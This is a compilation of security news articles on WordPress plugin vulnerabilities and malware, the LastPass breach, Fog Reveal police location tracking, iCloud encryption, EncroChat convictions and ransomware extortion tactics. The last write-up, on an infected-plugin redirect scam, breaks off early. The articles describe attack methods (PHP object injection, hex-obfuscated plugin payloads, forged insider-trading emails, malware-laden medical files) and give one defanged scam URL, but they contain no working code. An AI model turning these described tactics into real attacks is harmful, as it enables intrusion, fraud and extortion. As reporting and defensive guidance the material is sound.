WordPress Anti-Spam Plugin Vulnerability Affects Up To 60,000+ Sites

A vulnerability was discovered in the popular Stop Spammers Security | Block Spam Users, Comments, Forms WordPress plugin.

The purpose of the plugin is to stop spam in comments, forms, and sign-up registrations. It can stop spam bots and has the ability for users to input IP addresses to block.

It is a required practice for any WordPress plugin or form that accepts a user input to only allow specific inputs, like text, images, email addresses, whatever input is expected.

Unexpected inputs should be filtered out. That filtering process that keeps out unwanted inputs is called sanitization.

For example, a contact form should have a function that inspects what is submitted and block (sanitize) anything that is not text.

The vulnerability discovered in the anti-spam plugin allowed encoded input (base64 encoded) which can then trigger a type of vulnerability called a PHP Object injection vulnerability.

The description of the vulnerability published on the WPScan website describes the issue as:

“The plugin passes base64 encoded user input to the unserialize() PHP function when CAPTCHA are used as second challenge, which could lead to PHP Object injection if a plugin installed on the blog has a suitable gadget chain…”

The classification of the vulnerability is Insecure Deserialization.

The non-profit Open Web Application Security Project (OWASP) describes the potential impact of these kinds of vulnerabilities as serious, which may or may not be the case specific to this vulnerability.

Source and more details: https://www.searchenginejournal.com/wordpress-anti-spam-plugin-vulnerability-affects-up-to-60000-sites

New Linux malware uses 30 plugin exploits to backdoor WordPress sites

A previously unknown Linux malware has been exploiting 30 vulnerabilities in multiple outdated WordPress plugins and themes to inject malicious JavaScript.

According to a report by antivirus vendor Dr. Web, the malware targets both 32-bit and 64-bit Linux systems, giving its operator remote command capabilities.

The main functionality of the trojan is to hack WordPress sites using a set of hardcoded exploits that are run successively, until one of them works.

The targeted plugins and themes are the following:

  • WP Live Chat Support Plugin
  • WordPress – Yuzo Related Posts
  • Yellow Pencil Visual Theme Customizer Plugin
  • Easysmtp
  • WP GDPR Compliance Plugin
  • Newspaper Theme on WordPress Access Control (CVE-2016-10972)
  • Thim Core
  • Google Code Inserter
  • Total Donations Plugin
  • Post Custom Templates Lite
  • WP Quick Booking Manager
  • Faceboor Live Chat by Zotabox
  • Blog Designer WordPress Plugin
  • WordPress Ultimate FAQ (CVE-2019-17232 and CVE-2019-17233)
  • WP-Matomo Integration (WP-Piwik)
  • WordPress ND Shortcodes For Visual Composer
  • WP Live Chat
  • Coming Soon Page and Maintenance Mode
  • Hybrid

If the targeted website runs an outdated and vulnerable version of any of the above, the malware automatically fetches malicious JavaScript from its command and control (C2) server, and injects the script into the website site.

Infected pages act as redirectors to a location of the attacker’s choosing, so the scheme works best on abandoned sites.

These redirections may serve in phishing, malware distribution, and malvertising campaigns to help evade detection and blocking. That said, the operators of the auto-injector might be selling their services to other cybercriminals.

An updated version of the payload that Dr. Web observed in the wild also targets the following WordPress add-ons:

  • Brizy WordPress Plugin
  • FV Flowplayer Video Player
  • WooCommerce
  • WordPress Coming Soon Page
  • WordPress theme OneTone
  • Simple Fields WordPress Plugin
  • WordPress Delucks SEO plugin
  • Poll, Survey, Form & Quiz Maker by OpinionStage
  • Social Metrics Tracker
  • WPeMatico RSS Feed Fetcher
  • Rich Reviews plugin

The new add-ons targeted by the new variant indicate that the development of the backdoor is active at the moment.

Dr. Web also mentions that both variants contain functionality that is currently inactive, which would allow brute-forcing attacks against website administrator accounts.

Defending against this threat requires admins of WordPress websites to update to the latest available version the themes and plugins running on the site and replace those that are no longer developed with alternatives that being supported.

Using strong passwords and activating the two-factor authentication mechanism should help ensure protection against brute-force attacks.

Source: https://www.bleepingcomputer.com/news/security/new-linux-malware-uses-30-plugin-exploits-to-backdoor-wordpress-sites/

LastPass says hackers stole customers’ password vaults

It’s time to start changing your passwords

Password manager giant LastPass has confirmed that cybercriminals stole its customers’ encrypted password vaults, which store its customers’ passwords and other secrets, in a data breach earlier this year.

In an updated blog post on its disclosure, LastPass CEO Karim Toubba said the intruders took a copy of a backup of customer vault data by using cloud storage keys stolen from a LastPass employee. The cache of customer password vaults is stored in a “proprietary binary format” that contains both unencrypted and encrypted vault data, but technical and security details of this proprietary format weren’t specified. The unencrypted data includes vault-stored web addresses. It’s not clear how recent the stolen backups are.

LastPass said customers’ password vaults are encrypted and can only be unlocked with the customers’ master password, which is only known to the customer. But the company warned that the cybercriminals behind the intrusion “may attempt to use brute force to guess your master password and decrypt the copies of vault data they took.”

Toubba said that the cybercriminals also took vast reams of customer data, including names, email addresses, phone numbers and some billing information.

Password managers are overwhelmingly a good thing to use for storing your passwords, which should all be long, complex and unique to each site or service. But security incidents like this are a reminder that not all password managers are created equal and can be attacked, or compromised, in different ways. Given that everyone’s threat model is different, no one person will have the same requirements as the other.

In a rare shituation (not a typo) like this — which we spelled out in our parsing of LastPass’s data breach notice — if a bad actor has access to customers’ encrypted password vaults, “all they would need is a victim’s master password.” An exposed or compromised password vault is only as strong as the encryption — and the password — used to scramble it.

The best thing you can do as a LastPass customer is to change your current LastPass master password to a new and unique password (or passphrase) that is written down and kept in a safe place. This means that your current LastPass vault is secured.

If you think that your LastPass password vault could be compromised — such as if your master password is weak or you’ve used it elsewhere — you should begin changing the passwords stored in your LastPass vault. Start with the most critical accounts, such as your email accounts, your cell phone plan account, your bank accounts and your social media accounts, and work your way down the priority list.

The good news is that any account protected with two-factor authentication will make it far more difficult for an attacker to access your accounts without that second factor, such as a phone pop-up or a texted or emailed code. That’s why it’s important to secure those second-factor accounts first, like your email accounts and cell phone plan accounts.

Sources: https://blog.lastpass.com/2022/12/notice-of-recent-security-incident/

https://arstechnica.com/information-technology/2022/12/lastpass-says-hackers-have-obtained-vault-data-and-a-wealth-of-customer-info/

https://thehackernews.com/2022/12/lastpass-admits-to-severe-data-breach.html

https://techcrunch.com/2022/12/22/lastpass-customer-password-vaults-stolen/

Tech tool offers police ‘mass surveillance on a budget’

By GARANCE BURKE and JASON DEAREN

September 2, 2022

Local law enforcement agencies from suburban Southern California to rural North Carolina have been using an obscure cellphone tracking tool, at times without search warrants, that gives them the power to follow people’s movements months back in time, according to public records and internal emails obtained by The Associated Press.

Police have used “Fog Reveal” to search hundreds of billions of records from 250 million mobile devices, and harnessed the data to create location analyses known among law enforcement as “patterns of life,” according to thousands of pages of records about the company.

Sold by Virginia-based Fog Data Science LLC, Fog Reveal has been used since at least 2018 in criminal investigations ranging from the murder of a nurse in Arkansas to tracing the movements of a potential participant in the Jan. 6 insurrection at the Capitol. The tool is rarely, if ever, mentioned in court records, something that defense attorneys say makes it harder for them to properly defend their clients in cases in which the technology was used.

The company was developed by two former high-ranking Department of Homeland Security officials under former President George W. Bush. It relies on advertising identification numbers, which Fog officials say are culled from popular cellphone apps such as Waze, Starbucks and hundreds of others that target ads based on a person’s movements and interests, according to police emails. That information is then sold to companies like Fog.

“It’s sort of a mass surveillance program on a budget,” said Bennett Cyphers, a special adviser at the Electronic Frontier Foundation, a digital privacy rights advocacy group.

The documents and emails were obtained by EFF through Freedom of Information Act requests. The group shared the files with The AP, which independently found that Fog sold its software in about 40 contracts to nearly two dozen agencies, according to GovSpend, a company that keeps tabs on government spending. The records and AP’s reporting provide the first public account of the extensive use of Fog Reveal by local police, according to analysts and legal experts who scrutinize such technologies.

Federal oversight of companies like Fog is an evolving legal landscape. On Monday, the Federal Trade Commission sued a data broker called Kochava that, like Fog, provides its clients with advertising IDs that authorities say can easily be used to find where a mobile device user lives, which violates rules the commission enforces. And there are bills before Congress now that, if passed, would regulate the industry.

“Local law enforcement is at the front lines of trafficking and missing persons cases, yet these departments are often behind in technology adoption,” Matthew Broderick, a Fog managing partner, said in an email. “We fill a gap for underfunded and understaffed departments.”

Because of the secrecy surrounding Fog, however, there are scant details about its use and most law enforcement agencies won’t discuss it, raising concerns among privacy advocates that it violates the Fourth Amendment to the U.S. Constitution, which protects against unreasonable search and seizure.

What distinguishes Fog Reveal from other cellphone location technologies used by police is that it follows the devices through their advertising IDs, unique numbers assigned to each device. These numbers do not contain the name of the phone’s user, but can be traced to homes and workplaces to help police establish pattern-of-life analyses.

“The capability that it had for bringing up just anybody in an area whether they were in public or at home seemed to me to be a very clear violation of the Fourth Amendment,” said Davin Hall, a former crime data analysis supervisor for the Greensboro, North Carolina, Police Department. “I just feel angry and betrayed and lied to.”

Hall resigned in late 2020 after months of voicing concerns about the department’s use of Fog to police attorneys and the city council.

While Greensboro officials acknowledged Fog’s use and initially defended it, the police department said it allowed its subscription to expire earlier this year because it didn’t “independently benefit investigations.”

But federal, state and local police agencies around the U.S. continue to use Fog with very little public accountability. Local police agencies have been enticed by Fog’s affordable price: It can start as low as $7,500 a year. And some departments that license it have shared access with other nearby law enforcement agencies, the emails show.

Police departments also like how quickly they can access detailed location information from Fog. Geofence warrants, which tap into GPS and other sources to track a device, are accessed by obtaining such data from companies, like Google or Apple. This requires police to obtain a warrant and ask the tech companies for the specific data they want, which can take days or weeks.

Using Fog’s data, which the company claims is anonymized, police can geofence an area or search by a specific device’s ad ID numbers, according to a user agreement obtained by AP. But, Fog maintains that “we have no way of linking signals back to a specific device or owner,” according to a sales representative who emailed the California Highway Patrol in 2018, after a lieutenant asked whether the tool could be legally used.

Despite such privacy assurances, the records show that law enforcement can use Fog’s data as a clue to find identifying information. “There is no (personal information) linked to the (ad ID),” wrote a Missouri official about Fog in 2019. “But if we are good at what we do, we should be able to figure out the owner.”

Fog’s Broderick said in an email that the company does not have access to people’s personal information, and draws from “commercially available data without restrictions to use,” from data brokers “that legitimately purchase data from apps in accordance with their legal agreements.” The company refused to share information about how many police agencies it works with.

“We are confident Law Enforcement has the responsible leadership, constraints, and political guidance at the municipal, state, and federal level to ensure that any law enforcement tool and method is appropriately used in accordance with the laws in their respective jurisdictions,” Broderick said in the email.

“Search warrants are not required for the use of the public data,” he added Thursday, saying that the data his product offers law enforcement is “lead data” and should not be used to establish probable cause.

Kevin Metcalf, a prosecutor in Washington County, Arkansas, said he has used Fog Reveal without a warrant, especially in “exigent circumstances.” In these cases, the law provides a warrant exemption when a crime-in-process endangers people or an officer.

Metcalf also leads the National Child Protection Task Force, a nonprofit that combats child exploitation and trafficking. Fog is listed on its website as a task force sponsor and a company executive chairs the nonprofit’s board. Metcalf said Fog has been invaluable to cracking missing children cases and homicides.

“We push the limits, but we do them in a way that we target the bad guys,” he said. “Time is of the essence in those situations. We can’t wait on the traditional search warrant route.”

Fog was used successfully in the murder case of 25-year-old nurse Sydney Sutherland, who had last been seen jogging near Newport, Arkansas, before she disappeared, Metcalf said.

Police had little evidence to go on when they found her phone in a ditch, so Metcalf said he shared his agency’s access to Fog with the U.S. Marshals Service to figure out which other devices had been nearby at the time she was killed. He said Fog helped lead authorities to arrest a farmer in Sutherland’s rape and murder in August 2020, but its use was not documented in court records reviewed by AP.

Cyphers, who led EFF’s public records work, said there hasn’t been any previous record of companies selling this kind of granular data directly to local law enforcement.

“We’re seeing counties with less than 100,000 people where the sheriff is using this extremely high tech, extremely invasive, secretive surveillance tool to chase down local crime,” Cyphers said.

One such customer is the sheriff’s office in rural Rockingham County, North Carolina, population 91,000 and just north of Greensboro, where Hall still lives. The county bought a one-year license for $9,000 last year and recently renewed it.

“Rockingham County is tiny in terms of population. It never ceases to amaze me how small agencies will scoop up tools that they just absolutely don’t need, and nobody needs this one,” Hall said.

Sheriff’s spokesman Lt. Kevin Suthard confirmed the department recently renewed its license but declined to offer specifics about the use of Fog Reveal or how the office protects individuals’ rights.

“Because it would then be less effective as criminals could be cognizant that we have the device and adjust their commission of the crimes accordingly. Make sense?” Suthard said.

Fog has aggressively marketed its tool to police, even beta testing it with law enforcement, records show. The Dallas Police Department bought a Fog license in February after getting a free trial and “seeing a demonstration and hearing of success stories from the company,” Senior Cpl. Melinda Gutierrez, a department spokeswoman, said in an email.

Fog’s tool is accessed through a web portal. Investigators can enter a crime scene’s coordinates into the database, which brings back search results showing a device’s Fog ID, which is based on its unique ad ID number.

Police can see which device IDs were found near the location of the crime. Detectives or other officers can also search the location for IDs going forward from the time of the crime and back at least 180 days, according to the company’s user license agreement.

The emails and Fog’s Broderick contend the tool can actually search back years, however. Emails from a Fog representative to Florida and California law enforcement agencies said the tool’s data stretched back as far as June 2017. On Thursday Broderick, who had previously refused to address the question, said it “only has a three year reach back.”

While the data does not directly identify who owns a device, the company often gives law enforcement information it needs to connect it to addresses and other clues that help detectives figure out people’s identities, according to company representatives’ emails.

It is unclear how Fog makes these connections, but a company it refers to as its “data partner” called Venntel, Inc. has access to an even greater trove of users’ mobile data.

Venntel is a large broker that has supplied location data to agencies such as Immigration and Customs Enforcement and the FBI. The Department of Homeland Security’s watchdog is auditing how the offices under its control have used commercial data. That comes after some Democratic lawmakers asked it to investigate U.S. Customs and Border Protection’s use of Venntel data to track people without a search warrant in 2020. The company also has faced congressional inquiries about privacy concerns tied to federal law enforcement agencies’ use of its data.

Venntel and Fog work closely together to aid police detectives during investigations, emails show. Their marketing brochures are nearly identical, too, and Venntel staff has recommended Fog to law enforcement, according to the emails. Venntel said “the confidential nature of our business relationships” prevented it from responding to AP’s specific questions, and Fog would not comment on the relationship.

While Fog says in its marketing materials that it collects data from thousands of apps, like Starbucks and Waze, companies are not always aware of who is using their data. Venntel and Fog can collect billions of data points filled with detailed information because many apps embed invisible tracking software that follows users’ behavior. This software also lets the apps sell customized ads that are targeted to a person’s current location. In turn, data brokers’ software can hoover up personal data that can be used for other purposes.

Prior to publication, Fog’s Broderick refused to say how the company got data from Starbucks and Waze. But on Thursday, he said he did not know how data aggregators collected the information Fog Reveal draws from, or the specific apps from which the data was drawn.

For their part, Starbucks and Waze denied any relationship to Fog. Starbucks said it had not given permission to its business partners to share customer information with Fog.

“Starbucks has not approved Ad ID data generated by our app to be used in this way by Fog Data Science LLC. In our review to date, we have no relationship with this company,” said Megan Adams, a Starbucks spokesperson.

“We have never had a relationship with Fog Data Science, have not worked with them in any capacity, and have not shared information with them,” a Waze spokesperson said.

___

Fog Data Science LLC is headquartered in a nondescript brick building in Leesburg, Virginia. It also has related entities in New Jersey, Ohio and Texas.

It was founded in 2016 by Robert Liscouski, who led the Department of Homeland Security’s National Cyber Security Division in the George W. Bush adminstration. His colleague, Broderick, is a former U.S. Marine brigadier general who ran DHS’ tech hub, the Homeland Security Operations Center, during Hurricane Katrina in 2005. A House bipartisan committee report cited Broderick among others for failing to coordinate a swift federal response to the deadly hurricane. Broderick resigned from DHS shortly thereafter.

In marketing materials, Fog also has touted its ability to offer police “predictive analytics,” a buzzword often used to describe high-tech policing tools that purport to predict crime hotspots. Liscouski and another Fog official have worked at companies focused on predictive analytics, machine learning and software platforms supporting artificial intelligence.

“It is capable of delivering both forensic and predictive analytics and near real-time insights on the daily movements of the people identified with those mobile devices,” reads an email announcing a Fog training last year for members of the National Fusion Center Association, which represents a network of intelligence-sharing partnerships created after the Sept. 11 attacks.

Fog’s Broderick said the company had not invested in predictive applications, and provided no details about any uses the tool had for predicting crime.

Despite privacy advocates’ concerns about warrantless surveillance, Fog Reveal has caught on with local and state police forces. It’s been used in a number of high-profile criminal cases, including one that was the subject of the television program “48 Hours.”

Source: Tech tool offers police ‘mass surveillance on a budget’ | AP News

Why You Should Enable Apple’s New Security Feature in iOS 16.2 Right Now

Apple just rolled out iOS 16.2, a software update that includes a key new feature called Advanced Data Protection for iCloud. That means you can finally enable end-to-end encryption for your iCloud backups so no one but you—not even Apple—can access your iCloud data.

The fact that iCloud backups haven’t offered the option of end-to-end encryption until now has long been a point of controversy. iCloud backups of the Messages app were of particular concern because Apple could still hand over certain types of data within the backups to law enforcement. In particular, although conversations in Messages (along with other more personal data types, like the data stored in the Health app) were end-to-end encrypted, backups of those conversations were not. That meant police could subpoena those backups and gain access to texts. A couple of years ago, rumors suggested that Apple had dropped a plan to encrypt backups after the FBI complained about it. But now that the feature is here, everyone should turn it on. Here’s why.

Encryption is a mathematical process that jumbles data in a way that makes it unreadable without a key. End-to-end encryption ensures that only you control that key. This protection allows for private communication between a sender and a receiver—in this case, you’re both—such that third parties can’t access the data. Once you enable Advanced Data Protection, not even Apple will have the key to decrypt your data—and therefore it will have no way to help you regain access if you lose it. End-to-end encryption is common in secure messaging apps like Signal, as well as in software that stores sensitive data, such as password managers.

Many people enable iCloud backups because their iPhone bothers them repeatedly to do so, and perhaps they haven’t thought through the implications. Prior to today, storing a complete backup of your device, including your private photos and files, on a server—where someone other than you has access to it—has meant entering a data-privacy minefield. Someone gaining access to that account, through a data breach or by other means, would have access to anything stored there. And the problem hasn’t been limited to iCloud: Startlingly few cloud storage companies, in fact, offer end-to-end encryption.

But now, if you own one or more Apple devices, you can now make sure that your backups, photo libraries, and iCloud Drive file are end-to-end encrypted.

How to turn on Advanced Data Protection

Advanced Data Protection is rolling out as part of the iOS 16.2 over-the-air software update in the US today. Other parts of the world will receive Advanced Data Protection in early 2023. Follow these steps:

  1. Turn on two-factor authentication for your Apple ID if you haven’t done so already.
  2. Update all your Apple devices to iOS 16.2, iPadOS 16.2, macOS 13.1, tvOS 16.2, watchOS 9.2, or newer. If your devices are older and don’t support the latest versions of Apple’s operating systems, you’ll have to remove them from your Apple ID in order to enable Advanced Data Protection. That means you won’t be able to log into your Apple account on that older device, in which case, you should probably not enable Advanced Data Protection until you upgrade to a newer Apple device.
  3. On an iPhone or iPad, open Settings (or System Preferences on a Mac) > [Your name] > iCloud > Advanced Data Protection > Account Recovery. On this page you’ll see a choice of recovery methods. To use Advanced Data Protection, you must set up at least one of these two options (you can do both):
    • Designate a recovery contact, a trusted person from your contacts list who also owns an Apple device and whom you can easily reach out to in case you get locked out of your account. If you choose this method, you’ll send the recovery contact a message with a link that they will need to tap or click to accept. They’ll now have the key to help you unlock your account, but they won’t be able to unlock it on their own.
    • Set up a recovery key, a 28-character key that you can use to access your account in case you are locked out. Apple has no way to recover this key for you, so it’s important that you save it somewhere safe. If you choose this method, you’ll need to verify the key before you enable it, so write it down.
  4. Head back to Settings > [Your name] > iCloud > Advanced Data Protection, tap Turn on Advanced Data Protection, and then follow the on-screen prompts. Here, you need to confirm your recovery contact or enter your recovery key one more time, followed by your device’s passcode. If you have any older devices that cannot be updated, you can remove them from the list at this point.

Aside from not being able to ask Apple to help you access your data, if you regularly access data or files from iCloud.com, web access is disabled by default when Advanced Data Protection is enabled. That means you can’t access anything there—however, you can hop into Settings > [Your name] > iCloud and tap Access iCloud Data on the Web to temporarily turn on access when you need it.

Enabling the new security feature is relatively simple, though it’s important to note that if you choose the recovery key option, you must secure your encryption key and make sure to store it somewhere safe. If you choose a recovery contact, make sure to stay in touch with that person. Otherwise, if you lose your device, your data could be completely gone.

What data gets protected (and what doesn’t)

Until this update, Apple provided end-to-end encryption for some of the most sensitive data stored in iCloud backups by default, including passwords, health data, and payment information. If you don’t turn on Advanced Data Protection, here are the data categories that are end-to-end encrypted by default, according to Apple’s list:

  • Passwords and Keychain
  • Health data
  • Home data
  • Messages in iCloud (but not iCloud backups)
  • Payment information
  • Apple Card transactions
  • Apple Maps (details such as favorites and search history)
  • QuickType Keyboard learned vocabulary
  • Safari (details such as history, tab groups, and iCloud tabs)
  • Screen Time
  • Siri information (details such as settings and personalization)
  • Wi-Fi passwords
  • W1 and H1 Bluetooth keys
  • Memoji

When you turn on the feature, nine more data categories are end-to-end encrypted:

  • iCloud backup
  • iCloud Drive
  • Photos, including photos in a Shared Library, if everyone in the Shared Library has Advanced Data Protection enabled
  • Notes
  • Reminders
  • Safari Bookmarks
  • Siri Shortcuts
  • Voice Memos
  • Wallet passes

Some data stored in iCloud still isn’t encrypted, notably iCloud Mail and some third-party data, because doing so would break certain functions. The affected categories are as follows:

  • iCloud Mail
  • Contacts
  • Calendars
  • Photos stored in Shared Albums and any file shared with “Anyone with a link”
  • Any document shared for iWork collaboration
  • Any third-party app data that doesn’t employ its own end-to-end encryption (though if the backups of those apps are stored in iCloud Backup, they will be end-to-end encrypted, and if an app stores data in iCloud Drive, it should be end-to-end encrypted, as well)
  • Some metadata and usage information (details such as the names of your devices, the sizes of files, and more, which is notable because recent reports suggest that Apple isn’t entirely transparent about the data it collects)

If you use any collaboration features for Files or Notes, end-to-end encryption is enabled only when you and all other parties have Advanced Data Protection enabled. So, if you are collaborating through a shared Notes or Reminder item and want that data secured with end-to-end encryption, make certain your collaborators enable the feature, too.

Setting up Advanced Data Protection is an important step, but it’s not the end of the story. In addition to the various steps everyone needs to take to secure themselves online, be sure to take a few fundamental steps to secure your phone, such as using a strong passcode.

Source: https://www.nytimes.com/wirecutter/reviews/how-to-set-up-apples-new-icloud-encryption-security-feature/

Operation Venetic: Pet dog and accidental selfies help convict international drugs traffickers

A drugs trafficker helped investigators smash his own organised crime group by sending a photograph of his dog on encrypted communications platform EncroChat showing his partner’s phone number on the animal’s tag.

Danny Brown, 55, operated on EncroChat under the handle ‘throwthedice’.

He sent an image of his pet, named ‘Bob’, to co-conspirator Stefan Baldauf, 62, as they worked on a plot to send 448 kilos of MDMA worth £45m to Australia.

National Crime Agency investigators zoomed in on the phone number and used it – among many other tactics in a painstaking investigation – to prove Brown was part of the conspiracy.

Bob was present when Brown was eventually arrested.

Brown and Baldauf also sent accidental selfies of themselves on Encrochat – giving investigators more proof they were involved in the plan, which saw the drugs hidden in the arm of an industrial digger and shipped to Australia.

The OCG members sent the 40-tonne Doosan digger down under on the pretence of selling it.

They organised an online auction to make the excavator’s arrival in Australia look legitimate. But they rigged it by agreeing a pre-arranged bid with the intended recipients.

The auction provided the OCG a nervous moment when other potential buyers registered their interest in the digger.

OCG member Leon Reilly, 50, messaged Brown on EncroChat: “There are six people watching it.”

Brown replied: “F***ing hell, that’s not good is it.”

Brown, Baldauf and Reilly were convicted in June at Kingston Crown Court of drugs trafficking with three other men.

Today, Brown was jailed for 26 years, Baldauf for 28 and Reilly for 24.

The trio and their conspirators plotted in late 2019 and early 2020 to send the drugs, which were 77.5% pure, to Australia where MDMA’s street value is much higher than in the UK.

EncroChat was taken down in 2020.

The NCA led Operation Venetic – the UK law enforcement response to the takedown – which provided investigators with messages offenders had sent thinking the platform was safe from global law enforcement attention.

EncroChat users’ real names did not appear on phone messages – instead, they all used a ‘handle’ which investigators needed to attribute to real world suspects.

In one message, Brown, of Kings Hall Road, Bromley, Kent, sent a photo to his crime group of his television which showed his reflection in it.

And Baldauf, of Midhurst Road, Ealing, London, sent a picture of a brass door sign with his face visible in the reflection.

The OCG bought the excavator, a Doosan DX420, for 75,000 Euros.

Reilly, who used a UK address of Tudor Way, Hillingdon, Uxbridge, but was from Dunbeacon in Bantry, Co Cork, Ireland, arranged for the digger to be moved from Leeds by his company ‘Mizen Equipment’.

The digger was safely housed in an industrial unit in Grays, Essex.

Accomplice Tony Borg, 44, of Southwark Path, Basildon, Essex, took delivery of the machine at an industrial unit in Grays, Essex, and worked on it.

Philip Lawson, 61, of Wraysbury Road, Staines-upon-Thames, designed the hide and arranged a welder to cut open an arm of the digger and seal the Class A behind a lead lining.

Lawson bought a powerful welding machine and arranged for a sign-making company to make some stickers to cover the markings once it had been repainted.

It is believed the drugs were hidden inside the digger on 19 December 2020.

In the days before and after, the OCG members’ Encro phones were in frequent contact with each other and also used the same cell sites at certain times.

Mizen Equipment paid a haulage firm £1,600 to move the digger to Southampton Docks and it took from 24 January to 13 March to arrive in Brisbane, Australia.

Australian Border Force officers x-rayed the digger, removed the drugs, sealed the arm and installed a tracker and listening device before letting it move onto its intended destination – an auction house in Sydney.

The digger was moved to a small site west of Sydney in May 2020 and Lawson forwarded the Australian OCG a drawn diagram of exactly where the drugs were hidden and how the digger should be opened.

On 18 May two men from the Australian OCG spent two days trying to find the drugs before realising something was wrong.

EncroChat messages show the six UK men launched their own investigation and held meetings to find out who had stolen the drugs.

On 15 June 2020 Brown and Baldauf were arrested together in Putney, south west London. Brown was in possession of his Encro phone.

In Baldauf’s car was an iPhone with messages on it showing that he told people his Encro handle was ‘Boldmove’.

After being charged, the offenders repeatedly tried to get the case kicked out of court arguing the EncroChat evidence was inadmissible.

They were convicted by a jury.

Lawson was sentenced to 23 years; Murray to 24; and Borg to 15.

Gordon Meilack, 63, of Kingsway, Camberley, Surrey and Piotr Malinowski, 39, of De’Arn Gardens, Mitcham, London, were cleared of involvement in the conspiracy.

Two men were charged with offences relating to the Australian conspiracy following work between the NCA and Australian Federal Police. They are in the Australian judicial system.

Chris Hill, NCA operations manager, said: “These men thought they were safe on EncroChat but my officers did a superb and painstaking job of building the evidence against them through a mixture of traditional and modern detective skills.

“Brown and Baldauf’s accidental selfies and the photo of Bob the dog were the cherry on the cake in proving who was operating those handles.

“But the OCG went to enormous lengths, even rigging an auction, in a bid to transfer the drugs to Australian conspirators.

“The NCA works with partners at home and abroad to protect the public from the dangers of Class A drugs which wreak so much misery on communities in the UK.”

Source: https://www.nationalcrimeagency.gov.uk/news/operation-venetic-pet-dog-and-accidental-selfies-help-convict-international-drugs-traffickers

New Ransom Payment Schemes Target Executives, Telemedicine

Ransomware groups are constantly devising new methods for infecting victims and convincing them to pay up, but a couple of strategies tested recently seem especially devious. The first centers on targeting healthcare organizations that offer consultations over the Internet and sending them booby-trapped medical records for the “patient.” The other involves carefully editing email inboxes of public company executives to make it appear that some were involved in insider trading.

Alex Holden is founder of Hold Security, a Milwaukee-based cybersecurity firm. Holden’s team gained visibility into discussions among members of two different ransom groups: CLOP (a.k.a. “Cl0p” a.k.a. “TA505“), and a newer ransom group known as Venus.

Last month, the U.S. Department of Health and Human Services (HHS) warned that Venus ransomware attacks were targeting a number of U.S. healthcare organizations. First spotted in mid-August 2022, Venus is known for hacking into victims’ publicly-exposed Remote Desktop services to encrypt Windows devices.

Holden said the internal discussions among the Venus group members indicate this gang has no problem gaining access to victim organizations.

“The Venus group has problems getting paid,” Holden said. “They are targeting a lot of U.S. companies, but nobody wants to pay them.”

Which might explain why their latest scheme centers on trying to frame executives at public companies for insider trading charges. Venus indicated it recently had success with a method that involves carefully editing one or more email inbox files at a victim firm — to insert messages discussing plans to trade large volumes of the company’s stock based on non-public information.

“We imitate correspondence of the [CEO] with a certain insider who shares financial reports of his companies through which your victim allegedly trades in the stock market, which naturally is a criminal offense and — according to US federal laws [includes the possibility of up to] 20 years in prison,” one Venus member wrote to an underling.

“You need to create this file and inject into the machine(s) like this so that metadata would say that they were created on his computer,” they continued. “One of my clients did it, I don’t know how. In addition to pst, you need to decompose several files into different places, so that metadata says the files are native from a certain date and time rather than created yesterday on an unknown machine.”

Holden said it’s not easy to plant emails into an inbox, but it can be done with Microsoft Outlook .pst files, which the attackers may also have access to if they’d already compromised a victim network.

“It’s not going to be forensically solid, but that’s not what they care about,” he said. “It still has the potential to be a huge scandal — at least for a while — when a victim is being threatened with the publication or release of these records.”

The Venus ransom group’s extortion note. Image: Tripwire.com

Holden said the CLOP ransomware gang has a different problem of late: Not enough victims. The intercepted CLOP communication seen by KrebsOnSecurity shows the group bragged about twice having success infiltrating new victims in the healthcare industry by sending them infected files disguised as ultrasound images or other medical documents for a patient seeking a remote consultation.

The CLOP members said one tried-and-true method of infecting healthcare providers involved gathering healthcare insurance and payment data to use in submitting requests for a remote consultation on a patient who has cirrhosis of the liver.

“Basically, they’re counting on doctors or nurses reviewing the patient’s chart and scans just before the appointment,” Holden said. “They initially discussed going in with cardiovascular issues, but decided cirrhosis or fibrosis of the liver would be more likely to be diagnosable remotely from existing test results and scans.”

While CLOP as a money making collective is a fairly young organization, security experts say CLOP members hail from a group of Threat Actors (TA) known as “TA505,” which MITRE’s ATT&CK database says is a financially motivated cybercrime group that has been active since at least 2014. “This group is known for frequently changing malware and driving global trends in criminal malware distribution,” MITRE assessed.

In April, 2021, KrebsOnSecurity detailed how CLOP helped pioneer another innovation aimed at pushing more victims into paying an extortion demand: Emailing the ransomware victim’s customers and partners directly and warning that their data would be leaked to the dark web unless they can convince the victim firm to pay up.

Security firm Tripwire points out that the HHS advisory on Venus says multiple threat actor groups are likely distributing the Venus ransomware. Tripwire’s tips for all organizations on avoiding ransomware attacks include:

  • Making secure offsite backups.
  • Running up-to-date security solutions and ensuring that your computers are protected with the latest security patches against vulnerabilities.
  • Using hard-to-crack unique passwords to protect sensitive data and accounts, as well as enabling multi-factor authentication.
  • Encrypting sensitive data wherever possible.
  • Continuously educating and informing staff about the risks and methods used by cybercriminals to launch attacks and steal data.

While the above tips are important and useful, one critical area of ransomware preparedness overlooked by too many organizations is the need to develop — and then periodically rehearse — a plan for how everyone in the organization should respond in the event of a ransomware or data ransom incident. Drilling this breach response plan is key because it helps expose weaknesses in those plans that could be exploited by the intruders.

As noted in last year’s story Don’t Wanna Pay Ransom Gangs? Test Your Backups, experts say the biggest reason ransomware targets and/or their insurance providers still pay when they already have reliable backups of their systems and data is that nobody at the victim organization bothered to test in advance how long this data restoration process might take.

“Suddenly the victim notices they have a couple of petabytes of data to restore over the Internet, and they realize that even with their fast connections it’s going to take three months to download all these backup files,” said Fabian Wosar, chief technology officer at Emsisoft. “A lot of IT teams never actually make even a back-of-the-napkin calculation of how long it would take them to restore from a data rate perspective.”

Source: https://krebsonsecurity.com/2022/12/new-ransom-payment-schemes-target-executives-telemedicine/

Infected WordPress Plugins Redirect to Push Notification Scam

Attackers are always finding unique ways to avoid detection. Our teams regularly find malware on compromised websites which have been obfuscated to make it more difficult for webmasters to detect or understand. Obfuscation can take many forms, such as encrypting code or using complex algorithms to hide the true nature of the malicious contents. For example, many malware samples we detect are encoded into base64 to confuse website owners and evade detection.

But during a recent investigation, I stumbled across a rather interesting piece of malware using a more complex form of obfuscation. Instead of leveraging the typical base64 encoding to evade detection, the attacker was adding variations of a PHP function to normal plugin files which decoded hex2dec from a second file containing a hexadecimal payload.

Let’s take a closer look.

Unwanted redirects to fake captcha scam

A new client was complaining that whenever a site visitor clicked anywhere on their website, a browser tab was opened which redirected the victim to the following spammy web page: hxxps://1.guesswhatnews[.]com/not-a-robot/index.html

Redirect to push notification scam with fake captcha
Fake captcha displayed to redirected website visitors.

